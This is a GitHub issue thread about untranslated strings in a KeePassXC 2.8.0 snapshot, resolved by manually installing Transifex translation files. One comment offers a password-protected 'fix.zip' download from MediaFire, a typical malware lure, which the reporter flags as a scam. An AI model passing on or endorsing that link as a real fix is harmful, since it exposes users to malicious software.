### ISSUE TITLE
[Pre-release] [Bug] Untranslated text in Snapshot 25/8

### ISSUE THREAD

**Issue by Stephan-P** [keepassxreboot/keepassxc#11207]
![Snipaste_2024-08-29_09-29-18](https://github.com/user-attachments/assets/c91cc5a9-f133-47b7-b50b-15a5c9f063ed)

KeePassXC - Version 2.8.0-snapshot
Build Type: Snapshot
Revision: 48d0f2b

Qt 5.15.11
Debugging mode is disabled.

Operating system: Windows 11 Version 2009
CPU architecture: x86_64
Kernel: winnt 10.0.22631

Enabled extensions:
- Automatisch invullen
- Browserintegratie
- Passkeys
- SSH-agent
- KeeShare
- YubiKey
- Snel ontgrendelen

Cryptographic libraries:
- Botan 3.1.1

I may add more samples as I come across them...

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Stephan-P** [comment]
@droidmonkey , @varjolintu Please remove above SCAM contribution

**Comment by Stephan-P** [comment]
![image](https://github.com/user-attachments/assets/0ca0c4d4-deb9-4606-abf5-f9428bfe6593)

![image](https://github.com/user-attachments/assets/1930a2f6-5a88-491e-b215-2eb1eab2b91e)

![image](https://github.com/user-attachments/assets/6b1f1031-53f4-4dbe-9704-d7e1efa91f3b)

![image](https://github.com/user-attachments/assets/4b4acaf7-815d-4d7d-9a10-0c8b92c0491f)

![image](https://github.com/user-attachments/assets/0e1ba8a5-f3a2-4bd8-bc03-bfab5c88422a)

**Comment by varjolintu** [comment]
Translations are made in Transifex. If no translation for a string is found, it fallbacks to the default.

**Comment by Stephan-P** [comment]
@varjolintu I don't understand why this issue is being closed.
Yes translations are made in Transifex. I am one of the Dutch translators over there.
The issue is that the KPXC-code should be extended/improved to make these texts translatable through Transifex.

**Comment by varjolintu** [comment]
I can reopen this, but I looked at the strings, and those are already translatable. At least the passkey ones.

**Comment by Stephan-P** [comment]
In that case the code could hold faulty Transifex references

**Comment by varjolintu** [comment]
For example the "No entries with passkeys" shows that you have translated that string four months ago. I think your problem could be elsewhere. Maybe in your local system?

**Comment by droidmonkey** [comment]
You need to download the translation file manually from transifex and copy it into the appropriate folder of your snapshot build. We don't auto integrate the latest translation files for snapshot builds

**Comment by Stephan-P** [comment]
Will do that once again...

**Comment by Stephan-P** [comment]
Alright, I stand corrected, mostly.
All above have been taken care of, except this one:

![image](https://github.com/user-attachments/assets/01a2b2c2-1808-4a32-a5be-2516582bee8f)

**Comment by droidmonkey** [comment]
https://github.com/keepassxreboot/keepassxc/pull/11154
